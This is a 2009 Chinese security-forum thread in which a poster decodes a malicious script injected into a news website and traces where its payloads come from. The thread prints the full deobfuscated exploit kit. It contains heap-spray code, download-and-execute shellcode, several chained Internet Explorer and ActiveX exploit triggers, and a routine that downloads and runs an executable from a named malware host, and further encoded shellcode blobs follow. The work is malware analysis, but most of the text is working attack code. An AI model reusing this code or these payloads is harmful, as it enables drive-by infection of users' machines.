
networkedition - 2009-7-7 15:13:00
国外网马很少涉及去解密它,貌似都是很BT。尝试使用malzilla来解密一下哈,欢迎高手来拍板砖。在昨天的瑞星每日安全播报中http://read.southcn.com/good/sz/200811170004.htm(南方网 南方书城)这个网站,使用freshow分析出如下内容:

Log is generated by FreShow.
[wide]http://read.southcn.com/good/sz/200811170004.htm
    [frame]http://ZieF.pl/iraq.jpg
    [frame]http://ZieF.pl/iraq.jpg

这个iraq.jpg很可疑哟,下面使用神器来解密一下:



networkedition - 2009-7-7 15:19:00
点击Get后,弹出如下对话框,大致意思是重定向吧(E文不太好,^_^)



在这里我们点击Yes,获取到如下源文件内容:


networkedition - 2009-7-7 15:29:00
获取的源文件内容中有很多数字,看起来是按字符的十进制编码(charCode)做的混淆——严格说这是编码而不是加密,只是把每个字符换成了它的十进制码并用分隔符隔开。这里用笨办法,把源代码里的数字部分复制出来。由于内容过长,在此不贴了。将复制出的内容粘贴到在线解密工具,详见下图:

networkedition - 2009-7-7 15:41:00
在这里需要将分隔符替换为","号,使用在线解密工具十进制解密进行解密,详见下列截图:



networkedition - 2009-7-7 15:44:00
点击十进制解密按钮,解密后源代码如下:

// Blocking "sleep": spins on the main thread until `naptime` ms have elapsed,
// then eval()s the string `func`. The exploit stages below use it as
// sleep("attack(N);", ms) to chain one trigger after another with a delay.
function sleep(func,naptime){
var sleeping = true;
var now = new Date();
var alarm;
var startingMSeconds = now.getTime();
while(sleeping){
alarm = new Date();
// `alarmMSeconds` is never declared with var, so it leaks into global scope.
alarmMSeconds = alarm.getTime();
if (alarmMSeconds - startingMSeconds > naptime){ sleeping = false; }
}
// Stage chaining is done by evaluating the caller-supplied code string.
eval(func);
}
// Heap-spray state shared by ms()/hav(): `m` holds the sprayed string blocks,
// `mf` is a "spray already done" flag, and `url` is the download URL that every
// exploit path appends a `&spl=N` parameter to (N differs per exploit path).
var m=new Array();
var mf=0;
var url="http://jl.chura.pl/rc/load.php?id=508";
// Uppercase hex string of `num`, left-padded with '0' to at least `width` digits.
// Uses >>> so the loop terminates for values with the sign bit set.
function hex(num,width){
var digits="0123456789ABCDEF";
var hex=digits.substr(num&0xF,1);
while(num>0xF){
num=num>>>4;
hex=digits.substr(num&0xF,1)+hex;
}
var width=(width?width:0);
while(hex.length<width)hex="0"+hex;
return hex;
}
// Encodes a 32-bit value as two %uXXXX escapes, low 16 bits first, and
// unescape()s them so the resulting two UTF-16 code units hold the value
// little-endian in memory (the form needed for spray/NOP-sled and pointer data).
function addr(addr){
return unescape("%u"+hex(addr&0xFFFF,4)+"%u"+hex((addr>>16)&0xFFFF,4));
}
// Converts a raw "\xNN" byte string into the same bytes laid out in a JS string
// via addr()/unescape, four bytes per 32-bit group. charCodeAt past the end
// yields NaN, which the shifts turn into 0, so a trailing partial group is
// zero-padded. The outer unescape() is effectively a no-op on addr()'s output.
function unes(str){
var tmp="";
for(var i=0;i<str.length;i+=4){
tmp+=addr((str.charCodeAt(i+3)<<24)+
(str.charCodeAt(i+2)<<16)+
(str.charCodeAt(i+1)<<8)+
str.charCodeAt(i));
}
return unescape(tmp);
}
// Self-rescheduling 1-second timer started by the first ms() call. The body is
// a no-op self-assignment; presumably it only exists to keep a timer (and thus
// the script context holding the sprayed blocks) alive — intent not shown here.
function hav(){
mf=mf;
setTimeout("hav()",1000);
}
// Repeats `ss` (by doubling) until it covers at least `sss` bytes of UTF-16
// (2 bytes per char), then truncates to exactly sss/2 chars. Used to build the
// per-block sled that precedes the shellcode in ms().
function gss(ss,sss){
while(ss.length*2<sss)ss+=ss;
ss=ss.substring(0,sss/2);
return ss;
}
// Heap spray. `xpl` is the "&spl=N" suffix identifying which exploit path
// called it; it is appended to `url` and the whole URL is appended to the
// shellcode bytes below as the string the shellcode will download.
//
// About the shellcode bytes (from the visible opcodes, not from running it):
// it starts with xor eax,eax / mov eax,fs:[eax+0x30] (PEB walk to find a
// module base), contains a ror-13 style hashing loop (C1 CF 0D) with calls
// through [ebp+4], and pushes "urlm"/"on.d" plus ".exe" to build "urlmon.dll"
// and a file name. The 32-bit constants loaded into eax before each call
// (0xEC0E4E8E, 0x702F1A36, 0x0E8AFE98, 0x60E0CEEF) look like the commonly
// published LoadLibraryA / URLDownloadToFileA / WinExec / ExitThread hashes —
// NOTE(review): consistent with a download-and-execute stub; confirm in a
// debugger before relying on it. The later posts decode the appended URLs.
function ms(xpl){
var plc=unes(
"\x33\xC0\x64\x8B\x40\x30\x78\x0C\x8B\x40\x0C\x8B\x70\x1C\xAD\x8B"+
"\x58\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C\x8B\x58\x3C\x6A\x44\x5A"+
"\xD1\xE2\x2B\xE2\x8B\xEC\xEB\x4F\x5A\x52\x83\xEA\x56\x89\x55\x04"+
"\x56\x57\x8B\x73\x3C\x8B\x74\x33\x78\x03\xF3\x56\x8B\x76\x20\x03"+
"\xF3\x33\xC9\x49\x50\x41\xAD\x33\xFF\x36\x0F\xBE\x14\x03\x38\xF2"+
"\x74\x08\xC1\xCF\x0D\x03\xFA\x40\xEB\xEF\x58\x3B\xF8\x75\xE5\x5E"+
"\x8B\x46\x24\x03\xC3\x66\x8B\x0C\x48\x8B\x56\x1C\x03\xD3\x8B\x04"+
"\x8A\x03\xC3\x5F\x5E\x50\xC3\x8D\x7D\x08\x57\x52\xB8\x33\xCA\x8A"+
"\x5B\xE8\xA2\xFF\xFF\xFF\x32\xC0\x8B\xF7\xF2\xAE\x4F\xB8\x65\x2E"+
"\x65\x78\xAB\x66\x98\x66\xAB\xB0\x6C\x8A\xE0\x98\x50\x68\x6F\x6E"+
"\x2E\x64\x68\x75\x72\x6C\x6D\x54\xB8\x8E\x4E\x0E\xEC\xFF\x55\x04"+
"\x93\x50\x33\xC0\x50\x50\x56\x8B\x55\x04\x83\xC2\x7F\x83\xC2\x31"+
"\x52\x50\xB8\x36\x1A\x2F\x70\xFF\x55\x04\x5B\x33\xFF\x57\x56\xB8"+
"\x98\xFE\x8A\x0E\xFF\x55\x04\x57\xB8\xEF\xCE\xE0\x60\xFF\x55\x04"+url+xpl);
// Target address 0x0c0c0c0c, 1 MiB blocks. Each block is a sled of 0x0c0c0c0c
// words sized so that sled + shellcode + 0x38 bytes of string overhead fills
// the block. hb = (0x0c0c0c0c - 0x100000) / 0x100000 = 191.75, so the loop
// runs 192 times (~192 MiB of spray). `i` is an undeclared global.
var hsta=0x0c0c0c0c,hbs=0x100000,pl=plc.length*2,sss=hbs-(pl+0x38);
var ss=gss(addr(hsta),sss),hb=(hsta-hbs)/hbs;
// On a re-spray (later exploit path), drop the previous blocks first.
if (mf){
for (i=0;i<hb;i++)delete m[i];
CollectGarbage();
}
for(i=0;i<hb;i++)m[i]=ss+plc;
// First spray also starts the hav() keep-alive timer.
if(!mf){
mf=1;
hav();
}
return 0;
}
// Instantiates a COM control and returns it, or null if that fails.
// "{CLSID}" arguments become an <object classid="clsid:..."> element;
// anything else is treated as a ProgID for new ActiveXObject().
function cobj(obj){
var ret=null;
if(obj.substring(0,1)=="{"){
try{
var clsid=obj.substring(1,obj.length-1);
ret=document.createElement("object");
ret.setAttribute("classid","clsid:"+clsid);
return ret;
}catch(e){
return null;
}
}else{
try{
ret=new ActiveXObject(obj);
return ret;
}catch(e){
return null;
}
}
}
// Heap-layout helper state used by init()/flush()/alloc()/alloc_str()/free()
// (the naming — "plunger", lookaside, freeList — matches the publicly known
// heapLib-style helpers; NOTE(review): origin inferred from naming only).
// `padding` is grown to ~32K chars in init(); `heapBase` is a hard-coded guess
// of the process heap address used to compute a fake object pointer later.
var padding = "AAAA";
var heapBase = 0x00150000;
var memo;
// Prepares the heap helpers: grows `padding` by doubling until its BSTR size
// (4-byte length + 2 bytes/char + 2-byte terminator) reaches 65535, resets the
// allocation registry and does an initial flush(). `maxAlloc` is unused.
function init(maxAlloc){
while (4 + padding.length*2 + 2 < 65535)padding += padding;
memo = new Array();
flush();
}
// Drops the previous "plunger" allocations, forces a GC, then allocates
// 6 rounds of 32/64/256/32768-byte strings (sizes here are BSTR sizes, so
// (size-6)/2 chars each). Intended to drain free-list entries of those sizes
// so later allocations come from fresh memory. Uses eval() only to build the
// assignment — there is no reason it could not be a direct assignment.
function flush(){
delete memo["plunger"];
CollectGarbage();
memo["plunger"] = new Array();
var bytes = new Array(32, 64, 256, 32768);
for (var i = 0; i < 6; i++) {
for(var n = 0; n < 4; n++) {
var len = memo["plunger"].length;
eval("memo[\"plunger\"][len] = padding.substr(0, (" + bytes[n] + "-6)/2);");
}
}
}
// Allocates one string whose BSTR occupies `arg` bytes and records it under
// `tag` so free(tag) can release the whole group. The size check is an empty
// no-op left over from the original helper. A missing `tag` is stored under
// the key "undefined".
function alloc(arg, tag){
var size;
size = arg;
if (size == 32 || size == 64 || size == 256 || size == 32768) {}
if ( ! memo[tag] )memo[tag] = new Array();
var len = memo[tag].length;
memo[tag][len] = padding.substr(0, (arg-6)/2);
}
// Like alloc(), but stores a copy of the caller-supplied string `arg` itself
// (used for the fake vtable and fake-object chunks). `size` is computed and
// checked but never used. A missing `tag` is stored under "undefined".
function alloc_str(arg, tag){
var size;
size = 4 + arg.length*2 + 2;
if (size == 32 || size == 64 || size == 256 || size == 32768) {}
if ( ! memo[tag])memo[tag] = new Array();
var len = memo[tag].length;
memo[tag][len] = arg.substr(0, arg.length);
}
// Releases every string recorded under `tag`, forces a GC so the memory is
// actually returned, then flush()es to clear the freed sizes from free lists.
function free(tag) {
delete memo[tag];
CollectGarbage();
flush();
}
// Tries every CreateObject/GetObject signature on control `o` to obtain the
// ProgID `n`, swallowing each failure. This is how the script uses a
// data-access control to instantiate Shell.Application, ADODB.Stream, etc.
// outside the browser's normal ActiveX restrictions. Returns null on failure.
function CreateO(o,n){
var r=null;
try{r=o.CreateObject(n)}catch(e){}
if(!r){try{r=o.CreateObject(n,"")}catch(e){}}
if(!r){try{r=o.CreateObject(n,"","")}catch(e){}}
if(!r){try{r=o.GetObject("",n)}catch(e){}}
if(!r){try{r=o.GetObject(n,"")}catch(e){}}
if(!r){try{r=o.GetObject(n)}catch(e){}}
return(r);
}
// Download-and-execute through a control `a` that exposes CreateObject
// (attack(1)'s path, reported to the server as spl=7): builds the file path
// in the special folder 2 (TemporaryFolder in the FileSystemObject API),
// fetches the URL with a synchronous XMLHTTP GET, writes the binary body via
// ADODB.Stream, and launches it with Shell.Application.ShellExecute.
// Returns 1 on launch, 0 if no HTTP object could be created.
function Go(a){
var eurl=url+"&spl=7";
var fname="w32NOFJCyliz5mm5R.exe";
var fso=a.CreateObject("Scripting.FileSystemObject","")
var sap=CreateO(a,"Shell.Application");
var x=CreateO(a,"ADODB.Stream");
var nl=null;
fname=fso.BuildPath(fso.GetSpecialFolder(2),fname);
// Mode 3 = read/write stream; Type 1 = binary.
x.Mode=3;
// ProgID is split ("Micr"+"osoft.XMLH"+"TTP") only to dodge string matching;
// falls back through MSXML2 variants and finally native XMLHttpRequest.
try{nl=CreateO(a,"Micr"+"osoft.XMLH"+"TTP");nl.open("GET",eurl,false);}
catch(e){try{nl=CreateO(a,"MSXML2.XMLHTTP");nl.open("GET",eurl,false);}
catch(e){try{nl=CreateO(a,"MSXML2.ServerXMLHTTP");nl.open("GET",eurl,false);}
catch(e){try{nl=new XMLHttpRequest();nl.open("GET",eurl,false);}
catch(e){return 0;}}}}
x.Type=1;
nl.send(null);
// `rb` is an undeclared global.
rb=nl.responseBody;
x.Open();
x.Write(rb);
// 2 = overwrite if the file exists.
x.SaveTofile(fname,2);
sap.ShellExecute(fname);
return 1;
}
// Exploit-stage dispatcher. Stages chain via sleep("attack(N);", ms) in the
// order 1 -> 4 -> 3 -> 7 -> 9 -> 10 -> snpac(), each trying one IE/ActiveX
// vector and re-spraying with a distinct "&spl=N" so the server can tell
// which path fired. Every trigger is wrapped in try/catch so a failure just
// moves on to the next stage. Requires the Windows-only globals used below
// (ActiveXObject, CollectGarbage, document.scripts).
function attack(s){
var obj=null;
if(s==1){
// Stage 1: walk a null-terminated list of CLSIDs, embed each as an <object>,
// and if the control lets us CreateObject("Shell.Application"), run Go().
// NOTE(review): the list starts with the CLSIDs commonly associated with the
// MDAC RDS.DataSpace / MS06-014 technique; identities of the others are not
// established by this file.
var i=0;
var target=new Array("BD96C556-65A3-11D0-983A-00C04FC29E36","BD96C556-65A3-11D0-983A-00C04FC29E30","AB9BCEDD-EC7E-47E1-9322-D4A210617116","0006F033-0000-0000-C000-000000000046","0006F03A-0000-0000-C000-000000000046","6e32070a-766d-4ee6-879c-dc1fa91d2fc3","6414512B-B978-451D-A0D8-FCFDF33E833C","7F5B7F63-F06F-4331-8A26-339E03C0AE3D","06723E09-F4C2-43c8-8358-09FCD1DB0766","639F725F-1B2D-4831-A9FD-874847682010","BA018599-1DB3-44f9-83B4-461454C84BF8","D0C07D56-7C69-43F1-B4A0-25F5A11FAB19","E8CCCDDF-CA28-496b-B050-6C07C962476B",null);
while(target[i]){
var a=null;
a=document.createElement("object");
a.setAttribute("classid","clsid:"+target[i]);
// createElement never returns null, so `if(a)` is always true.
if(a){try{var b=CreateO(a,"Shell.Application");if(b){Go(a);}}catch(e){}}
i++;
}
sleep("attack(4);",4000);
return 0;
}
if(s==3){
// Stage 3 (spl=8): spray, then hammer WebViewFolderIcon.setSlice with a huge
// first argument 128 times (202116108 == 0x0c0c0c0c). Matches the public
// MS06-057 setSlice trigger — NOTE(review): identification by pattern only.
try{
obj=cobj("WebViewFolderIcon.WebViewFolderIcon.1");
if(obj){
ms("&spl=8");
for(var i=0;i<128;i++){
var wvfio=new ActiveXObject("WebViewFolderIcon.WebViewFolderIcon.1");
try{wvfio.setSlice(0x7ffffffe,0,0,202116108);}catch(e){}
var wvfit=new ActiveXObject("WebViewFolderIcon.WebViewFolderIcon.1");
}
sleep("attack(7);",2000);
return 0;
}
}catch(e){}
sleep("attack(7);",1);
return 0;
}
if(s==4){
// Stage 4 (spl=9): embed CLSID EC444CB6-..., spray, then call
// document.scripts[0].createControlRange().length as the trigger.
// `z` is an undeclared global; the Math.ceil line has no effect.
try{
obj=cobj("{EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F}");
if(obj){
ms("&spl=9");
z=Math.ceil(0x0c0c0c0c);
z=document.scripts[0].createControlRange().length;
sleep("attack(3);",2000);
return 0;
}
}catch(e){}
sleep("attack(3);",1);
return 0;
}
if(s==7){
// Stage 7 (spl=10): embed CLSID 77829F14-..., spray, then pass a >5000-char
// buffer of 0x0c0c0c0c to SetFormatLikeSample (an overflow-style trigger in
// an audio ActiveX control — NOTE(review): exact product/CVE not shown here).
try{
obj=cobj("{77829F14-D911-40FF-A2F0-D11DB8D6D0BC}");
if(obj){
ms("&spl=10");
var buf = "";
while (buf.length < 5000) buf += "\x0c\x0c\x0c\x0c";
obj.SetFormatLikeSample(buf);
sleep("attack(9);",2000);
return 0;
}
}catch(e){}
sleep("attack(9);",1);
return 0;
}
if(s==9){
// Stage 9 (spl=11): DirectAnimation.PathControl.KeyFrame with a crafted heap.
// Builds a fake vtable (0x7ceb9090 followed by 31 copies of 0x0c0c0c0c, the
// spray address), grooms the heap with the alloc/free helpers so a chunk
// containing addr(fakeObjPtr) lands where the freed object was, then calls
// KeyFrame(0x40000801, ...). fakeObjPtr depends on the hard-coded heapBase.
try{
obj=cobj("DirectAnimation.PathControl");
if(obj){
ms("&spl=11");
init();
var jmpecx = 0x0c0c0c0c;
var vtable = addr(0x7ceb9090);
for (var i = 0; i < 124/4; i++)vtable += addr(jmpecx);
vtable += padding.substr(0, (1008-138)/2);
var fakeObjPtr = heapBase + 0x688 + ((1008+8)/8)*48;
var fakeObjChunk = padding.substr(0, (0x200c-4)/2) + addr(fakeObjPtr) + padding.substr(0, 14/2);
CollectGarbage();
flush();
for (var i = 0; i < 100; i++)alloc_str(vtable);
alloc_str(vtable, "lookaside");
free("lookaside");
for (var i = 0; i < 100; i++)alloc(0x2010);
for (var i = 0; i < 2; i++) {
alloc_str(fakeObjChunk);
alloc_str(fakeObjChunk, "freeList");
}
alloc_str(fakeObjChunk);
free("freeList");
obj.KeyFrame(0x40000801, new Array(1), new Array(1));
sleep("attack(10);",2000);
return 0;
}
}catch(e){}
sleep("attack(10);",1);
return 0;
}
if(s==10){
// Stage 10: hand off to the Snapshot Viewer / PDF / XML chain.
snpac();
return 0;
}
}
// Final stage. Sprays ~100 blocks of 0x0a0a0a0a words (each grown to 0xd0000
// chars) followed by a second copy of the download shellcode — this copy has
// the URL baked in; the trailing %u-encoded bytes spell ".../load.php?id=508&spl=5"
// (decoded in a later post). It then injects an XML data-binding fragment
// referencing &#x0a0a; into an element with id "xmlplace", which must exist in
// the enclosing HTML (not part of this script). The markup matches the public
// MS08-078 XML data-binding trigger — NOTE(review): identification by pattern.
// `memory` and `i` are undeclared globals.
function xml(){
var shellcode=unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u6A2F%u2E6C%u6863%u7275%u2E61%u6C70%u722F%u2F63%u6F6C%u6461%u702E%u7068%u693F%u3D64%u3035%u2638%u7073%u3D6C%u0035");
var spray = unescape("%u0a0a%u0a0a");
do { spray += spray; } while(spray.length < 0xd0000);
memory = new Array();
for(i = 0; i < 100; i++){ memory[i] = spray + shellcode; }
document.getElementById("xmlplace").innerHTML = "<XML ID=I><X><C><![CDATA[<image SRC=http://&#x0a0a;&#x0a0a;.example.com>]]></C></X></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>";
}
// Embeds the server-generated PDF (pdf.php?id=508) into the "pdfplace"
// element, which must exist in the enclosing HTML. Probes for the Acrobat
// control first, but the catch branch injects the same <embed> anyway, so the
// PDF is loaded whether or not the probe succeeds. The PDF is decoded in a
// later post and carries two more copies of the download shellcode
// (spl=3 and spl=2). Schedules the xml() stage 100 ms later.
function pdf(){
try {
var obj = null;
obj = new ActiveXObject("AcroPDF.PDF");
if (!obj) {obj = new ActiveXObject("PDF.PdfCtrl");}
if (obj) {document.getElementById("pdfplace").innerHTML = "<embed width='150' height='150' src='http://jl.chura.pl/rc/pdf.php?id=508' type='application/pdf'></embed>";}
} catch(e) {
document.getElementById("pdfplace").innerHTML = "<embed width='150' height='150' src='http://jl.chura.pl/rc/pdf.php?id=508' type='application/pdf'></embed>";
}
setTimeout("xml()", 100);
}
// Snapshot-control file drop (spl=4): sets SnapshotPath to the payload URL and
// CompressedPath to a local .exe, then calls PrintSnapshot so the control
// itself downloads the URL to that path. CLSID F0E42D50-... with this
// SnapshotPath/CompressedPath/PrintSnapshot sequence matches the public
// Snapshot Viewer (MS08-041-era) file-download trigger — NOTE(review):
// identification by pattern only. Note '\N' is not a JS escape sequence, so
// the string literal actually evaluates to 'C:NOFCym2lizm5Rw35.exe' (no
// backslash, i.e. a drive-relative path). Errors are swallowed and pdf() is
// scheduled 300 ms later regardless of outcome.
function snpac(){
var buf1 = 'http://jl.chura.pl/rc/load.php?id=508&spl=4';
try{
var obj = document.createElement('object');
obj.setAttribute('classid', 'clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9');
obj.setAttribute("id", "obj");
obj.SnapshotPath = buf1;
obj.CompressedPath = 'C:\NOFCym2lizm5Rw35.exe';
obj.PrintSnapshot();
} catch(e) {}
setTimeout("pdf()", 300);
}
// Entry point: kicks off stage 1; the remaining stages chain themselves.
attack(1);


networkedition - 2009-7-7 15:53:00
简单分析一下解密后的源代码。整个脚本是一个多漏洞利用(exploit kit)页面:从 attack(1) 开始,按 attack(4)→attack(3)→attack(7)→attack(9)→attack(10)→snpac()→pdf()→xml() 的顺序依次尝试多个 IE/ActiveX 漏洞;各条路径下载 load.php 时带的 spl= 参数不一样(7、8、9、10、11、4、5,以及 pdf 里的 3、2),服务端应该就是靠它统计哪个漏洞命中了。先来看一下这个链接http://jl.chura.pl/rc/load.php?id=508,再用神器Get一下(注意:这一步是在下载真实的恶意可执行文件,务必在隔离的虚拟机里操作,绝对不要运行),弹出如下对话框,详见下列截图:



(⊙o⊙)哦,我们解密出一个load.exe。
networkedition - 2009-7-7 16:01:00
再来看一下,xml() 函数里还有一段 shellcode,源代码如下:


%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u6A2F%u2E6C%u6863%u7275%u2E61%u6C70%u722F%u2F63%u6F6C%u6461%u702E%u7068%u693F%u3D64%u3035%u2638%u7073%u3D6C%u0035


在这里就不讲如何解密了,解密得到一个:
http://jl.chura.pl/rc/load.php?id=508&spl=5
再用神器Get一下
networkedition - 2009-7-7 16:03:00


也是一个load.exe
networkedition - 2009-7-7 16:12:00
再来看一下这个链接地址:http://jl.chura.pl/rc/pdf.php?id=508,貌似是个pdf文件,同样使用神器Get一下,或使用下载工具直接下载。
详见下列截图:


networkedition - 2009-7-7 16:24:00
我们点击保存,把这个pdf下载下来。按惯例先用记事本直接打开看原文件内容,没有什么可用信息(PDF 里的脚本一般放在压缩过的对象流里,明文是看不到的),接下来使用redoce工具解开,详见下列截图:

networkedition - 2009-7-7 16:34:00
在这里我们不再详细讲解这个十进制加密解密方法,具体可参见文章开头部分,解密得到两个shellcode部分:


%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u6A2F%u2E6C%u6863%u7275%u2E61%u6C70%u722F%u2F63%u6F6C%u6461%u702E%u7068%u693F%u3D64%u3035%u2638%u7073%u3D6C%u0033


shellcode解密结果为:
http://jl.chura.pl/rc/load.php?id=508&spl=3,应该也是个load.exe
networkedition - 2009-7-7 16:37:00
下面是另外一个shellcode:


%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u6A2F%u2E6C%u6863%u7275%u2E61%u6C70%u722F%u2F63%u6F6C%u6461%u702E%u7068%u693F%u3D64%u3035%u2638%u7073%u3D6C%u0032


解密结果为:http://jl.chura.pl/rc/load.php?id=508&spl=2
同样应该也是个load.exe

好了,至此分析完毕,欢迎高手拍板砖:kaka12:
shadowmin - 2009-7-7 17:15:00
十进制解密也可以在神器里进行,当然结果是一样的。
我不是高手,所以这不是拍砖:kaka16:
networkedition - 2009-7-7 17:20:00
ls的不错,神器没有怎么研究过,又学一招:kaka8:
gtyre2 - 2009-7-7 22:30:00
老师咋不用汉化版的:kaka6:
pigboy - 2009-7-8 10:50:00
晕忽  慢慢看下
脑~残 - 2009-7-21 13:40:00
不懂
最后灬赵丿子龙 - 2009-7-25 18:33:00
LZ讲的好。。。。。。
全没看懂。。。。。。
好啊  好
09kaka - 2009-7-29 14:19:00
:kaka1: 很好很强大!
leebye - 2009-8-2 16:25:00
不错不错,学习下
两个铁球 - 2009-8-5 0:11:00
123

不是不让我们一般会员说话吗?怎么又准了?
xuefuyuan - 2009-8-5 13:05:00
支持一下
woskywalker - 2009-8-5 17:45:00
看了下,基本懂,不过对那个解PDF和SWF的工具redoce还是不会用
重启电脑 - 2009-8-8 14:05:00
不错
支持一下:kaka1:
redbsd - 2009-8-20 14:22:00
真是好东西,谢谢了。
lnxa - 2009-8-26 16:56:00
学习一下。。
东→吴 - 2009-8-27 11:48:00
感觉好像在看天方夜潭,完全不懂。:kaka4:
Beloved1988 - 2009-8-29 21:03:00
新手,专门来学习网马解密的、、、、、
古木希 - 2009-9-7 12:55:00
拒绝木马;你我同行!:kaka1:
古木希 - 2009-9-7 12:56:00
支持以下;做的很好;继续努力!:kaka12: